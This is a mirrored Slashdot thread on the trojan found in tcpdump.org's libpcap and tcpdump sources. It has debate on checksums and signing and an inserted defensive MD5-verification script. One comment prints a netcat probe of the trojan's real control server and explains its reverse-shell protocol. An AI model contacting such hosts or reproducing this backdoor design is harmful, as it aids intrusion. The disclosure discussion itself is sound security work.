Slashdot Mirror


Trojan Found in libpcap and tcpdump

msolnik writes "Members of The Houston Linux Users Group discovered that the newest sources of libpcap and tcpdump available from tcpdump.org were contaminated with trojan code. HLUG has notified the maintainers of tcpdump.org. See our reports here or here."

204 of 486 comments

  1. Glad I use Gentoo by rob-fu · · Score: 4, Informative

    Emerge doesn't get tcpdump source from tcpdump.org, but from ibiblio.org.

    How did it get into tcpdump.org's sources exactly? The HLUG page isn't clear.

    1. Re:Glad I use Gentoo by dohcvtec · · Score: 5, Interesting

      How did it get into tcpdump.org's sources exactly?
      Presumably the tcpdump.org FTP server got 0wned, and the trojan was planted, but the people that found the trojan aren't the server admins - they just found it in the source they downloaded. And I doubt we will find out how the perpetrators got in, either. It would have been nice to find out in more detail what happened when the OpenBSD FTP server was compromised, but people are usually tight-lipped in these cases.

      --
      -- Never hit a man with glasses. Hit him with a baseball bat.
    2. Re:Glad I use Gentoo by elrond1999 · · Score: 5, Informative

      Emerge does get sources from TCPDump if all other mirrors are down. Excerpt from ebuild:
      SRC_URI="http://www.tcpdump.org/release/${P}.tar.gz
      http://www.jp.tcpdump.org/release/${P}.tar.gz"

      SRC_URI is a last resort mirror...
      Luckily the MD5 sum caught the trojan: (From the gentoo ebuild digest)
      MD5 03e5eac68c65b7e6ce8da03b0b0b225e tcpdump-3.7.1.tar.gz 428737

    3. Re:Glad I use Gentoo by taviso · · Score: 4, Insightful

      I think the worst thing is that the server the trojan connects to is still operating:

      $ nc -vvv 212.146.0.34 1963
      mars.raketti.net [212.146.0.34] 1963 (?) open
      M sent 0, rcvd 1


      The program connects to 212.146.0.34 (mars.raketti.net) on port 1963 and reads one of three one byte status codes:

      A - program exits
      D - forks and spawns a shell and does the needed file descriptor manipulation to redirect it to the existing connection to 212.146.0.34.
      M - closes connection, sleeps 3600 seconds, and then reconnects


      Maybe someone should contact the machine administrator before more people get owned.

      --
      ex$$
    4. Re:Glad I use Gentoo by luismunoz · · Score: 2, Funny

      [Insert the obligatory joke about /. slashdotting this server too] :)

    5. Re:Glad I use Gentoo by replica · · Score: 2, Interesting

      The mirrors contained the trojan as well.

      Besides, this is an exploit of trust; no operating system is any more vulnerable than any other. Binary distributions would only contain the libpcap backdoor to ignore tcp port 1963; the actual trojan appears in the configure script.

      How many times have you downloaded sources and blindly run ./configure && make? This is certainly a case for running builds in a systrace jail.

      For the record, this fits the modus operandi of trojans found in irssi, fragroute, dsniff, BitchX, OpenSSH, and sendmail.

    6. Re:Glad I use Gentoo by kasperd · · Score: 2

      [Insert the obligatory joke about /. slashdotting this server too] :)

      Seriously, if a lot of people modified the trojan to connect and find out what the cracker is up to, we might find out some interesting stuff.

      --

      Do you care about the security of your wireless mouse?
    7. Re:Glad I use Gentoo by Marc2k · · Score: 2

      I agree with your points about this being an exploit of trust, but the ibiblio.org mirrors did *not* contain Trojaned versions of the source, the HLUG page declared them as safe versions.

      --
      --- What
    8. Re:Glad I use Gentoo by Tassach · · Score: 2

      Systrace is a good idea, but I think a better solution for most people is to rely on a certifying entity to ensure that they get clean code. This is, IMHO, the real value that RedHat gives: it's well worth $60/yr/system to be ensured that the package updates you get have been screened by someone who's looking for exactly this sort of thing.

      --
      Why is it that the proponents of "one nation under God" are so eager to get rid of "liberty and justice for all"?
    9. Re:Glad I use Gentoo by Afrosheen · · Score: 2

      Another reason I like to run Mandrake on my servers. Mandrake is pretty thorough about security and checking their code, and the mirrors give me md5-checksummed rpms so I know they're all authentic.

      Granted, there have been one or two rpms that have had security warnings issued and new rpms have appeared nearly immediately, but AFAIK nothing has been trojaned like this.

    10. Re:Glad I use Gentoo by Codifex+Maximus · · Score: 2

      Yep. The cracker is evidently in-the-know and should be expected to know that we know. He probably also knows that we know he knows we know... you know?

      --
      Codifex Maximus ~ In search of... a shorter sig.
    11. Re:Glad I use Gentoo by Tomble · · Score: 2, Insightful
      However, the md5sums would catch it (the md5sums in Gentoo are of the non-trojaned version, luckily).
      Seeing the fact that the modifications to the source helped to obscure the trojan by making the pcap library quietly ignore packets associated with the remote site, reminded me of the paranoia I tend to feel over security, and the mechanisms we use for it.

      Such as, what if a cracker got into my machine and set up (amongst other things) a patched version of md5sum, that knew which files had been altered, and what their original md5sums were, so I couldn't rely on that for my security? This paranoia went as far as worrying about whether it would be possible for someone to alter gcc, such that not only would it add malware functions to anything I compiled, but also work out when it was being used to compile a compiler, and install this same functionality into that. I spent ages trying to convince myself that that would be far too complex to do, maybe even impossible*, but at the same time tried to work out ways to bootstrap a C compiler that I could believe was indeed utterly trojan-free.

      <sigh> I expect there's a word for that, and I'm sure it's not one I want to hear :P

      * I'm sure that it could be made to use certain cues, such as filenames, etc., to decide that it was compiling part of a specific compiler, such as another copy of gcc, and only do the modification on that. But I'm sure you can't write an algorithm to detect that a piece of code constitutes a compiler, let alone part of one (because of course, gcc only works on one source file at a time, not whole projects).

      --
      Be careful! New moon tonight.
    12. Re:Glad I use Gentoo by kasperd · · Score: 2

      He probably also knows that we know he knows we know... you know?

      You got a point there, I see. But does he already know that we think he probably knows that we know he knows we know? Anyway I really don't care what he knows, I just want to know what he is going to do.

      --

      Do you care about the security of your wireless mouse?
    13. Re:Glad I use Gentoo by Codifex+Maximus · · Score: 2

      He's going to find a way to overflow a buffer, root yer box or get you to download a trojaned source, install it and blindly give it root privileges, plant a back door and stay out of sight.

      The worst crackers are the ones you never hear about.

      --
      Codifex Maximus ~ In search of... a shorter sig.
  2. as soon as this evening... by mirko · · Score: 2

    apt-get update...
    well, I have not installed these sniffing proggies, so it should be okay.
    Now it could be worse:
    If you suspect your binaries to be trojanized, you'd want to sniff your own machine, but if (and it is the case) the sniffer is trojanized, then it could possibly hide such "activities"...
    I actually read the article and it however seems that it was not the case here...
    phew :-)

    --
    Trolling using another account since 2005.
    1. Re:as soon as this evening... by Megane · · Score: 5, Informative
      If you suspect your binaries to be trojanized, you'd want to sniff your own machine, but if (and it is the case) the sniffer is trojanized, then it could possibly hide such "activities"... I actually read the article and it however seems that it was not the case here...

      If you read the article more carefully, you will notice that the binaries aren't trojaned. This is a trojan in the build scripts only. So ironically, only the paranoids who build from source (but aren't paranoid enough to demand an MD5) got hit by this.

      --
      #naabhaprzrag, #sverubfr-000, #agi-fcbafberq, negvpyr[pynff*=' negvpyr-ary-'] { qvfcynl: abar !vzcbegnag; }
    2. Re:as soon as this evening... by OrangeSpyderMan · · Score: 3, Funny

      If you read the article more carefully, you will notice that the binaries aren't trojaned.

      Phew, glad to hear that, I was worried the trojaned sources actually built trojaned binaries - glad you got that cleared up for us.

      --
      Try NetBSD... safe,straightforward,useful.
    3. Re:as soon as this evening... by arkanes · · Score: 3, Insightful

      Okay, I've been confused about this MD5 thing. Most often, the MD5s are either in a file in the ftproot, or in the readme. If you've owned the server enough to stick a trojan in the source code, can't you just put in the MD5s of your altered source? I thought the main reason for checksums was to check for corrupt/missing data after the download, which was way more important in the noisy line modem days.

    4. Re:as soon as this evening... by OrangeSpyderMan · · Score: 3, Insightful

      You don't seem that confused to me! :-) Your point is entirely valid: if the checksum is on the compromised FTP server, it's not going to be much help. If it's on a separate webserver, there's a chance it'll be valid, but using a checksum, while being a quick and reasonably simple way of checking such downloads, should never be taken as a guarantee. The only thing they will guarantee is that the copy you have on your hd is the same as the copy that's on the server. Only if you can trust the source of the checksum are they useful in such circumstances, otherwise take them with a pinch of salt.

      --
      Try NetBSD... safe,straightforward,useful.
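The Gentoo digest line quoted in the elrond1999 comment above has the shape "MD5 <hex> <filename> <size>", and the reply just above makes the point that such a digest only helps if it came from somewhere other than the server that served the tarball. The following is an added example (not code from the thread or from Gentoo) that parses that digest format and checks a downloaded file against it, size first and then MD5, using a constructed sample tarball and two constructed tampered copies; the digest line is assumed to have been obtained out of band.

```python
import hashlib
import os
import shutil
import tempfile

# Constructed sample standing in for a downloaded tarball. The digest line on
# the page refers to the real tcpdump-3.7.1.tar.gz, which is not reproduced here.
SAMPLE_TARBALL = b"constructed tarball contents for the example\n" * 64


def make_digest_line(name, data):
    """Build a Gentoo-style digest line: 'MD5 <hex> <filename> <size>'.

    In practice this line comes from the portage tree, i.e. from a channel
    independent of the mirror that served the tarball; that independence is
    what gives the check its value.
    """
    return "MD5 %s %s %d" % (hashlib.md5(data).hexdigest(), name, len(data))


def parse_digest_line(line):
    """Parse 'MD5 <hex> <filename> <size>' into (hex, filename, size)."""
    parts = line.split()
    if len(parts) != 4 or parts[0] != "MD5":
        raise ValueError("not a Gentoo MD5 digest line: %r" % line)
    _algo, hexdigest, filename, size = parts
    return hexdigest.lower(), filename, int(size)


def verify_against_digest(path, digest_line):
    """Return (ok, reason) for the file at path against one digest line.

    The size check is cheap and catches a tarball with a script appended;
    the MD5 check catches a same-size modification.
    """
    expected_md5, expected_name, expected_size = parse_digest_line(digest_line)
    if os.path.basename(path) != expected_name:
        return False, "filename mismatch"
    actual_size = os.path.getsize(path)
    if actual_size != expected_size:
        return False, "size mismatch: %d != %d" % (actual_size, expected_size)
    h = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    if h.hexdigest() != expected_md5:
        return False, "md5 mismatch"
    return True, "ok"


def demo():
    """Check a clean copy and two constructed tampered copies against one digest."""
    name = "sample-0.0.1.tar.gz"
    digest = make_digest_line(name, SAMPLE_TARBALL)  # the trusted digest line
    flipped = bytearray(SAMPLE_TARBALL)
    flipped[10] ^= 0x01  # one bit changed, size unchanged
    candidates = {
        "clean": SAMPLE_TARBALL,
        "appended": SAMPLE_TARBALL + b"# constructed: extra bytes appended\n",
        "same_size": bytes(flipped),
    }
    results = {}
    for label, data in candidates.items():
        workdir = tempfile.mkdtemp()
        try:
            path = os.path.join(workdir, name)
            with open(path, "wb") as f:
                f.write(data)
            results[label] = verify_against_digest(path, digest)
        finally:
            shutil.rmtree(workdir)
    return results


if __name__ == "__main__":
    for label, (ok, reason) in demo().items():
        print("%-10s %s (%s)" % (label, "OK" if ok else "REJECT", reason))
```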
    5. Re:as soon as this evening... by EvilAlien · · Score: 2

      ln -s apt-get windows-update

      --
      perl -e 'print $i=pack(c5, (41*2), sqrt(7056), (unpack(c,H)-2), oct(115), 10)'
    6. Re:as soon as this evening... by harlows_monkeys · · Score: 5, Insightful
      The funny thing about the paranoids who build from source is that, unless they actually look at the source, it doesn't gain them anything. There are three ways to build from source.

      1. Just grab the source and build it. This is no better than grabbing a binary and running it, as far as security goes.

      2. Grab the source, check the MD5 sum, and then build it. This is no better than grabbing the binary, checking the binary's MD5 sum, and then running it.

      3. Grab the source, diff it against the previous source you were running, and at least glance at the diffs to see if anything looks suspicious. This is the only way that using source gives you more security than using the binary.

      People using source for security who are in category 1 or 2 are just fooling themselves.

    7. Re:as soon as this evening... by harlows_monkeys · · Score: 3, Insightful
      Correct.


      The right way to do things is for the person who makes the release package (e.g., the tarball, or the rpm, or whatever) to digitally sign it. They should do the signing on a machine other than the web server or FTP server. Ideally, they do the signing on their development machine, which is safely tucked away on a network that crackers can't get to.

    8. Re:as soon as this evening... by kevinank · · Score: 5, Informative
      Okay, I've been confused about this MD5 thing. Most often, the MD5s are either in a file in the ftproot, or in the readme. If you've owned the server enough to stick a trojan in the source code, can't you just put in the MD5s of your altered source?

      To be useful the MD5 file should be signed, and the GPG key that signed it should be one that you know and trust. Even that may not be enough if the key owner can be tricked into revealing his private key, or the trojan horse can be introduced into the code on the code owner's development machine, but it does add one layer of depth to your security.

      The first time I had a server hacked (mountd exploit, xmas '99) the machine details were sold on IRC, probably in exchange for credit card numbers, to a somewhat clueless Singapore exchange student who proceeded to delete all of my syslog files so that when I logged in remotely the root mailbox was full of complaints about missing logfiles. The rooted system was up for about a week, during which time it probed several thousand IPs for basic exploits, hosted an IRC channel through eggdrop (together with names of the hacker's friends and passwords), all on a machine with no rootkit installed and very little attempt to hide activity.

      Basically I got lucky the first time, and ever since then I've been paranoid, in hopes there won't be a second time. But with a smart hacker and a good root kit, I think even with my paranoia that I could miss a hacker on my machine for a long time, so I suspect it is only a matter of time before some well known developer gets hacked and has signed sources distributed with a trojan horse inside.

      --
      LibBT: BitTorrent for C - small - fast - clean (Now Versio
    9. Re:as soon as this evening... by dark_panda · · Score: 3, Insightful

      One thing that would be useful would be for the author to either GPG/PGP sign the file with the MD5 sums with a trusted signature or sign the actual source/binary tarballs themselves. A lot of linux vendors seem to be doing this recently.

      J

    10. Re:as soon as this evening... by zen+parse · · Score: 2, Insightful

      If you read the script properly, you'll see it does trojan the binaries built from it. "The (relevant) gencode.c diff:" part shows how it filters out the port used by the trojan.

    11. Re:as soon as this evening... by Paladin128 · · Score: 2

      Still, it's important that the source is available. The paranoid people that try step 3, or actually look at the source, are the reason I trust Open Source software. If it was a closed source app, and someone patched the binary with a somewhat stealthy trojan, we might not have known for months.

      Using Open Source Software is about trust for me; I have no problem if someone uses closed source apps on a non-crucial desktop machine. I'm very dubious using any closed source apps on any server I deploy, however.

      --
      Lex orandi, lex credendi.
    12. Re:as soon as this evening... by dbarclay10 · · Score: 3, Funny
      People using source for security who are in category 1 or 2 are just fooling themselves.
      You know that. I know that. Try telling THEM :) (Where "THEM" includes my boss, who makes me compile everything from source [and for Christ's sake, I maintain packages in the Debian archive!], but won't pay me or anybody else to actually *audit* the source, god-damnit.)
      --

      Barclay family motto:
      Aut agere aut mori.
      (Either action or death.)
    13. Re:as soon as this evening... by nzhavok · · Score: 2

      Basically I got lucky the first time, and ever since then I've been paranoid, in hopes there won't be a second time

      I got r00ted earlier this year. Serves me right for running a severely underpatched box I suppose. Probably not too much of a problem since I was on dialup though. Did you actually do anything to this guy? Weren't you tempted to log on to IRC and chat with him? Or else start distributing his passwords of him and his friends to other people on IRC? Just wondering :)

      --

      He who defends everything, defends nothing. -- Fredrick The Great
    14. Re:as soon as this evening... by dasunt · · Score: 2

      First, a disclaimer - I don't know a thing about compilers, and for coding - what I know can fill a very small bucket. However, that doesn't stop most people on slashdot from posting, so it shouldn't stop me. :)

      I was told that building from source makes the compiled code partially machine-specific. Thus an exploit that worked in the default binary might not work in the binary that I compiled.

      Is there any compiler gurus that want to clarify this for me one way or another?

      Thanks

    15. Re:as soon as this evening... by kevinank · · Score: 3, Interesting
      I got r00ted earlier this year. Serves me right for running a severely underpatched box I suppose. Probably not too much of a problem since I was on dialup though. Did you actually do anything to this guy? Weren't you tempted to log on to IRC and chat with him? Or else start distributing his passwords of him and his friends to other people on IRC? Just wondering :)

      Yeah... my servers front end my home network, so they are turned on 24/7 and right now are connected through redundant DSL connections to the Internet. So mine make a somewhat attractive target.

      Since I am basically a lazy sysadmin, my approach had been to use really obscure hardware for my server. To accomplish that I bought a Rebel Netwinder on the theory that any exploit out for x86 would probably take months to be ported to the StrongARM (the StrongARM instruction set is both restrictively small, and completely anal about non-aligned memory accesses, so hand-coded assembly is a pain to write if you are trying to take advantage of a stack overflow of some kind.)

      Recently I've swapped the rebel box for another Intel server, this time running RH7.3, and I bought a subscription to RHN to keep it up to date. Since RHN manages all of the security updates and dependencies, all I have to do is log on once a week or so and request the updates. So now I get to be lazy in two regards; first it is much easier to add new software (StrongARM porting being not my cup of tea), and secondly RHN takes care of the security updates.

      I imagine that Debian users would argue likewise for apt-get.

      --
      LibBT: BitTorrent for C - small - fast - clean (Now Versio
    16. Re:as soon as this evening... by kevinank · · Score: 3, Interesting
      Did you actually do anything to this guy? Weren't you tempted to log on to IRC and chat with him? Or else start distributing his passwords of him and his friends to other people on IRC?

      Oops, forgot to answer that. I did log on to IRC and tracked down a couple of the users listed in the eggdrop config files. The original channel was no longer active, but there were a few people with the same IDs logged in on another channel; but the channel content was so spooky that it kind of freaked me out at the time. For about five minutes the only thing in the channel were various people sending messages like 'CCs', or 'eggable accts'. Then suddenly some guy posted a message saying approximately: 'so and so is a lousy copier', then 'I may as well give this out as a freebie since I don't want him to get all the use of it', followed by some guy's name, address, SSN, phone, and credit card numbers.

      At that point I decided I was in the middle of things I didn't want to be in. I did call the person to let them know that his credit card information had been stolen, and to watch his receipts, but basically dropped it there. As far as I know the FBI only cares about computer hacking if there has been at least $1k of damage. I had about a day to rebuild my server (before replacing it a month later with the Rebel), but nothing close to $1k; no deleted files or anything.

      I did track down the person's Nick which basically turned into a Google search, but since he'd been using that Nick for a long time and in many different places, it was very easy to do. The Nick seemed to belong to a student at UCB, previously a student in Singapore, but the evidence was pretty loose, and in any case I doubt I could have done more than make a few legal threats. Ultimately I decided to chalk it all down as a learning experience and let it go (but I still have the backup tapes of the hacked machine if I ever need them.)

      Handing out other people's passwords wouldn't have been possible. Eggdrop stores them in encrypted form so even with the contents of the password file there wasn't anything I could do to retrieve their plain text passwords.

      --
      LibBT: BitTorrent for C - small - fast - clean (Now Versio
  3. Hrmm by Anonymous Coward · · Score: 2, Funny

    Who would have thought that TCPDUMP would have crap like that in it?

  4. Eventually, this would happen by Rotten · · Score: 5, Insightful

    And if I don't remember, this happened before. Of course this is one of the biggest strengths of the Open Source Model.
    Code is constantly audited, checked and corrected. If your closed source software has backdoors or trojans...well....who knows, but on Open Source it is easily detected.

    1. Re:Eventually, this would happen by khendron · · Score: 5, Informative

      Easily detected? I wonder about this. If you look at the date stamp on the trojaned configure script, it is December 10th, 2001.

      Does that mean that this trojan has been around for almost a year before anybody noticed? If that's true, it does not meet my definition of "easily detected".

      --
      Life is like a web application. Sometime you need cookies just to get by.
    2. Re:Eventually, this would happen by Rotten · · Score: 2, Interesting

      Personally I've seen many backdoors in closed source software; even more, as a programmer years ago, I was instructed to put backdoors on Banking software by my employer and the bank auditing team. And let me tell you that the security was so bad that I personally switched my bank account from that institution to another.
      I don't think the only irrelevant comment is thinking that bad things(r) happen only in one place. Like I said, on open source software, I Can Audit Myself The Code.

    3. Re:Eventually, this would happen by Rotten · · Score: 4, Insightful

      Of course you have never dissected a rootkited server. Nobody trusts the date stamps, not even my grandmother does it.

      Have you ever changed the date of a file? It's quite easy.

    4. Re:Eventually, this would happen by Anonymous Coward · · Score: 2, Interesting

      This argument can of course be reversed: Because sources are open, one can insert trojans.

      So there's no point mentioning it.

      The point is: When was the specific change added? By whom? The maintainer should know. Let us know. Then put the person who sent in the patch with the trojan in a black list so his/her future patches to open source programs are first severely checked, if accepted at all.

      That's more like it -I think-.

    5. Re:Eventually, this would happen by Rotten · · Score: 2, Insightful

      Please, I just replied to two other "MAYBE" Posts. Talk about facts:

      The same that applies to somebody breaking into a open source code repository applies to a closed source repository.

      If the trojaned code is inserted after the auditing and goes into a production/distribution state, then the consumer/user has NO WAY to detect the problem.

      You are talking about the same Microsoft that wants to take to court independent researchers that detect security flaws in MS products?

      Or the same Microsoft that hides security problems on their products?

      And...Have you ever used CVS?

    6. Re:Eventually, this would happen by shatfield · · Score: 2

      Some "kiddie" most likely did not do this.

      Perhaps this is the work of an international ring of expert black hat hackers who are doing this in order to build up their network of computers that are available as jumping points for future hacking?

      I'm not worried about "kiddies" in the closed source world, but about the incredibly devious companies that produce programs. Don't think for a second that Microsoft hasn't put back doored software onto your computer.. that's already been documented.

      --
      "To make a mistake is only human; to persist in a mistake is idiotic." Cicero
    7. Re:Eventually, this would happen by khendron · · Score: 2

      Of course time stamps are not to be trusted. That is not the point I am trying to make.

      I am actually asking a question: how long was this trojan released before it was discovered? I, personally, do not know. I was hoping somebody else could tell me the answer.

      --
      Life is like a web application. Sometime you need cookies just to get by.
    8. Re:Eventually, this would happen by r55man · · Score: 5, Informative
      Does that mean that this trojan has been around for almost a year before anybody noticed? If that's true, it does not meet my definition of "easily detected".

      I downloaded libpcap/0.7.1 from tcpdump.org on September 2 of this year (just 2 months ago), and it was not trojaned (I keep a record of md5 sums, and was able to check this just now).

      Probably whoever modified the file just touched it to restore the original timestamp. This is trivial to do.

    9. Re:Eventually, this would happen by Melantha_Bacchae · · Score: 5, Interesting

      An AC wrote:

      > closed src doesn't have its src on some
      > webserver for some kiddie to trojan in the first
      > place. sure the possibility of some employee or
      > the employer itself to trojan the src, but most
      > open source trojans are someone breaking into
      > the web server and uploading modified src. by
      > definition this wont happen with closed src
      > since closed src doesn't release src, so your
      > argument is irrelevant.

      Oh, no? Look here:

      http://news.zdnet.co.uk/story/0,,s2082221,00.html

      Microsoft had their source available to some cracker for three months back in 2000. Of course they later spun it down to "one day and we were watching them all the time".

      Point is, closed source can be vulnerable too. Only Microsoft knows if any damage was really done, and they aren't telling us squat.

      "At this moment, it has control of systems all over the world.
      And...we can't do a damn thing to stop it."
      Miyasaka, "Godzilla 2000 Millennium" (Japanese version)

    10. Re:Eventually, this would happen by bellings · · Score: 3, Funny

      Now - who has most to gain from a highly visible trojan that's in fact virtually useless - Microsoft.

      No! It's John Ashcroft! This is just the first step towards the Brave New World Order, as correctly foretold on that ground-breaking show "The X-Files."

      Before Chris Carter and David Duchovny were eliminated and replaced with robotic clones by the old CIA lackeys of George Bush Senior, that show was the only thing on television that really explained what was going on in the world. There was a brief attempt by the FOX network to continue feeding you important news about technology and politics, but the Lone Gunmen show was quickly eliminated by the evil forces...

      --
      Slashdot is jumping the shark. I'm just driving the boat.
    11. Re:Eventually, this would happen by Bruce+Perens · · Score: 2
      You don't need the source to trojan something. In fact, most trojans are simply virus-infected binaries. The entire purpose of most viruses is to trojan binary programs with another copy of the virus.

      Bruce

    12. Re:Eventually, this would happen by aridhol · · Score: 2

      Not necessarily. Take, for example, the Mozilla Project. Anyone is able to submit a patch, but it won't get into the codebase until it has been reviewed twice (three times during a release period). Any major open-source project should have something similar (although I admit that I don't know much about any other project's procedures).

      --
      I can't say that I don't give a fuck. I've just run out of fuck to give.
    13. Re:Eventually, this would happen by Bruce+Perens · · Score: 3, Interesting
      Well, consider the alternative. What do you call a program that trojans a binary? Most viruses do just that, don't they? So, we have ample proof that binaries can be trojaned, and there is less chance for you to find out because you don't have the source.

      Bruce

    14. Re:Eventually, this would happen by Bruce+Perens · · Score: 3, Interesting
      Uh, I'm not so sure. How do you check binaries to see if they have been trojaned? You run a virus scanner. What do viruses do? Most of them trojan a binary with a copy of themselves. How does a virus get found? By its effects. How does a source-code trojan get found? By people reading the source, or by its effects.

      Bruce

    15. Re:Eventually, this would happen by Bruce+Perens · · Score: 5, Informative
      Remember Interbase? It came with a trojan from Borland. The Open Source folks found it only AFTER the program was made open source. It had the trojan for at least 6 years before it became Open Source. It was running airplane reservation systems. Somebody got a lot of free flights.

      Why do you think only an employee can trojan a binary, anyway? Most viruses modify binaries. Certainly many virus-infected binaries have been distributed professionally.

      Bruce

    16. Re:Eventually, this would happen by Bruce+Perens · · Score: 5, Insightful
      In handling the press and public perception for this, it's important that we make the point that binary programs are trojaned all of the time. In fact, most viruses have as their sole purpose the modification of binaries to insert a trojan copy of the virus into the binary, and to execute the virus payload. Much proprietary software has been distributed in infected state.

      The difference is that with Open Source you have an additional means of detecting the corruption - not only by its effects (as with the binary), but by reading the source.

      Bruce

    17. Re:Eventually, this would happen by Bruce+Perens · · Score: 5, Insightful
      Also, we need to get better about signing our archives and heeding the signatures. C'mon folks! I wrote about this in the old linuxworld.com webzine in 1996!

      Bruce

    18. Re:Eventually, this would happen by 13Echo · · Score: 3, Informative

      Things aren't just *added* to the codebase of open source programs. You can't just walk up and pop some code into the codebase. It doesn't work that way. There is always a code maintainer who reviews the changes before applying the patches. I can't think of any exceptions to this. Can you?

    19. Re:Eventually, this would happen by legoboy · · Score: 3, Insightful
      You don't need the source to trojan something. In fact, most trojans are simply virus-infected binaries. The entire purpose of most viruses is to trojan binary programs with another copy of the virus.

      How quickly the world forgets how things like the original Back Orifice were distributed... Too funny to read 'This couldn't happen with closed source!'

      --
      If a tree falls on an anonymous coward yelling 'first post' in the forest, does anybody hear?
    20. Re:Eventually, this would happen by FallLine · · Score: 2
      Uh, I'm not so sure. How do you check binaries to see if they have been trojaned? You run a virus scanner. What do viruses do? Most of them trojan a binary with a copy of themselves.
      Oh give me a break. There's a world of difference between a virus that blindly inserts malicious code (e.g., destroy sector 0) into any binary it can get its hands onto and a true trojan that was written for a special purpose by an actual human being. Although it's technically possible to insert a trojan into a binary file it is at least as hard as open source code is easy to audit. For instance, your average disgruntled sysadmin could modify, say, an open source financial software package pretty damn easily (not to mention the fact that he also has the means to place it) to, say, deposit a fraction of every deposit into his account (ok, that's not original), but that same person is unlikely to have the skill or the patience to make a truly undetectable trojan in a binary/proprietary package. Likewise, a hacker (yes, I know) can easily trojan an open source login program, but not a closed source one. Empirically speaking, there are a couple dozen complete backdoor packages for Linux and other open source systems, but none that I know of for Windows (well certainly not a lot). Now maybe windows can be backdoored in other ways, but the point still stands. This is especially true when the software is updated with newer versions; the open source backdoor can be trivially modified for relatively minor changes while the closed source backdoor cannot be so easily modified. If you are going to assert that open source is easier to audit, then you must also admit that it is easier to trojan. The two go hand in hand.
    21. Re:Eventually, this would happen by dylan_- · · Score: 3, Informative
      What a load of crap! Internet Explorer saves your URL/Searches! STOP THE PRESSES! Internet Explorer saves cookies and history! BREAKING NEWS! OMIGOD IT'S A CONSPIRACY!
      And keeps them after you've instructed it to clear its history and cookies. That's the point. Didn't you read the article?
      Whoa, Microsoft installed "secret" files! How evil! The system attribute has only been around since, uh, DOS 1.0 or something!
      And doesn't display them even when you turn on the display of hidden and system files in explorer. Didn't you read the article?

      I would complain if Konqueror didn't show me all dot files after I'd enabled viewing them, or if the history file was being backed up without my knowledge.
      --
      Igor Presnyakov stole my hat
    22. Re:Eventually, this would happen by MarkusQ · · Score: 2

      Oh give me a break.

      Oh, give me a break. Your post is riddled with misconceptions & logical inconsistencies. For example:

      There's a world of difference between a virus that blindly inserts malicious code (e.g., destroy sector 0) into any binary it can get its hands onto and a true trojan that was written for a special purpose by an actual human being.

      So, the "true trojan" was written by an "actual human being" whilst the "virus" was written by...what? A tree frog?

      No, it was written by an actual human being.

      To do what? To "destroy sector 0"? How fast would that spread? Typically, a virus is designed to attach a copy of itself to the binary, producing a composite that contains the original code and code written by the virus writer, in much the same way that a trojaned program is a composite of code from the same two sources.

      And so on.

      -- MarkusQ

      P.S. You may want to check your sources. A preliminary scan indicates that you may have been trojaned by the MSFUD virus.

    23. Re:Eventually, this would happen by mosch · · Score: 2, Insightful

      hell, you can change the date from the command line... just use touch (it takes an optional timestamp)

    24. Re:Eventually, this would happen by bockman · · Score: 3, Informative
      Obviously there are exceptions - that's how this occurred - unless of course you are suggesting that the maintainer of this package was complicit in adding the trojan.

      If this trojan got inside like the others (OpenSSH and Bind, IIRC), it was _not_ a patch submitted to the project. Simply, somebody rooted the FTP server and substituted the official tarball with the trojanized one.
      In other words, the weak point that was exploited was not that anybody can contribute to an open source project (which is not a weakness at all IMO) but that source tarballs are hosted on insufficiently protected FTP servers.

      There are counter-measures against this weakness. As long as distros use them (and I hope they do), it is unlikely that one of these trojans will slip into an official CD.

      --
      Ciao

      ----

      FB

    25. Re:Eventually, this would happen by Marc2k · · Score: 2

      I'm not siding with either paradigm on this one, but you can't broadly apply something that Microsoft did (of all companies) to the rest of the closed source world. There is some merit and dignity left in a few of the companies, and surely the world's leader in insecure data solutions should not be the archetypal closed source company. I'm not saying that the original poster was very lucid or correct, but surely he had a point. Let me amend:

      No closed source corporation worth its salt would ever leave source anywhere near a webserver.

      Microsoft has generally always done a piss poor job with information security, even in handling their own information.

      --
      --- What
    26. Re:Eventually, this would happen by tshak · · Score: 2

      If your closed source software has backdoors or trojans...well....
      Well, that's why you have peer review, software test engineers (that test for security, not just breaking bugs). The reality is I don't have time to find these trojans, so I expect a company to do it internally. True, with Open Source there are "more eyes" looking at the code, but there's no guarantee of the competence of those eyes.

      --

      There is no longer anything that can be done with computers that is nontrivial and clearly legal. -- Paul Phillips
    27. Re:Eventually, this would happen by tshak · · Score: 2

      Microsoft had their source available to some cracker for three months back in 2000.

      Just because _parts_ of the Windows Source was leaked thanks to help from an Employee doesn't mean that that "cracker" could modify the code and check it in.

      --

      There is no longer anything that can be done with computers that is nontrivial and clearly legal. -- Paul Phillips
    28. Re:Eventually, this would happen by FallLine · · Score: 2

      What a nit. You say riddled and yet you can only name one supposed inconsistency which really is not and it is not even apropos to the question at hand. Nowhere did I say that a human did not author viruses originally. What I was referring to is that, while a virus is ultimately derived from a human, the application is, of necessity, so generic that it does not substantively interact with code in the program which it is infecting. In other words, an actual human can produce code for a specific application, but the virus, by definition not a human, does not. For instance, it may insert a block or two of binary code at a couple of locations, but its sole purpose is to propagate itself further and to, possibly, carry some malicious code (e.g., destroy sector 0; look it up if you don't know where the MBR in DOS is located). Contrast this with a trojan that was authored by a human for a specific purpose to intercept particular functions or what have you and do them in a way that is not easy to detect. [Note: while it may be technically possible to make that kind of specific virus, these are practically unheard of, and this does not in any way mean that open source is any less easy to trojan]

      Put bluntly, if you wish to hold up viruses as an example of the frequency of "trojans" in closed source software, then you should make a strong distinction between the virus' very generic attacks and the often far more dangerous and subtle trojan attacks of humans on specific code and installations.

    29. Re:Eventually, this would happen by Melantha_Bacchae · · Score: 2

      Marc2k wrote:

      > I'm not siding with either paradigm on this one,
      > but you can't broadly apply something that
      > Microsoft did (of all companies) to the rest of
      > the closed source world.

      The poster I responded to claimed it was impossible for closed source to be similarly cracked into. I simply pointed out one example where it was.

      > No closed source corporation worth its salt
      > would ever leave source anywhere near a
      > webserver.

      You don't need a webserver to have a computer cracked into. The web is a very recent addition to the internet. There were worms and other nastiness crawling around networks well before the web was ever invented.

      If an individual closed source developer has internet access on their development machine (for say email and online help - MSDN in the Microsoft world), the internet has access to their source code. Something as simple as an emailed trojan executable arriving via Outlook could send source files home to its master, and deliver patches from its master. (I am pointing out a security hole to patch here, don't go doing anything like this!)

